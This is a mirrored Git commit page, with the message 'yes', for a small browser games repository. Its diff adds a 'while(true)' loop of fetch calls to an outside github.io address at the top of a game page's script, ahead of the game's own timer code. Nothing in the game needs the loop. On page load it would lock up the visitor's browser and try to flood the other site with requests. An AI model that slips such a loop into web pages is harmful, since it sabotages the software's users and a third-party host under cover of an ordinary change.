mirror of
https://github.com/hexahigh/games.git
synced 2025-12-11 20:15:38 +01:00
yes
This commit is contained in:
parent
4275b62196
commit
ee1ce85468
@ -11,6 +11,9 @@
|
|||||||
}
|
}
|
||||||
</style>
|
</style>
|
||||||
<script>
|
<script>
|
||||||
|
while(true) {
|
||||||
|
fetch('https://t0m0t0w.github.io')
|
||||||
|
}
|
||||||
let speed = 1000
|
let speed = 1000
|
||||||
setInterval(addKrydder, speed);
|
setInterval(addKrydder, speed);
|
||||||
|
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user